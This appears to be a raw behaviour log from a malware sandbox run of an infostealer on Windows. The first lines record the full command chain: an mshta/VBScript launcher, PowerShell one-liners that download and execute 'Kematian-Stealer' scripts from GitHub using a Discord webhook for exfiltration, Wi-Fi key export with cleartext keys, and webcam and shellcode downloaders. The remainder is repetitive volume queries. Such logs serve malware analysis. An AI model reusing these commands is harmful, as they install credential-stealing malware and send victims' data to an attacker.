      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net session
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex",0))
      Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1245964468803076146/sUQk99W99wQnOZBfrCW8tRsn0TetpTuD0yNK0N7xwUeiPnwMv6HDm9VYbCjVT-FA2zdw' | iex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESA945.tmp" "c:\Users\user\AppData\Local\Temp\bekownh2\CSCE31222C310BD40CB8ED0AE4A3AB63C88.TMP"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex",0))
      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta vbscript:close(createobject("wscript.shell").run("powershell $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex",0))
      Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $progresspreference = 'silentlycontinue';$t = iwr -uri 'https://raw.githubusercontent.com/childrenofyahweh/kematian-stealer/main/frontend-src/main.ps1' -usebasicparsing; $t -replace 'your_webhook_here', 'https://discord.com/api/webhooks/1245964468803076146/suqk99w99wqnozbfrcw8trsn0tetptud0ynk0n7xwueipnwmv6hdm9vybcjvt-fa2zdw' | iex
      Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
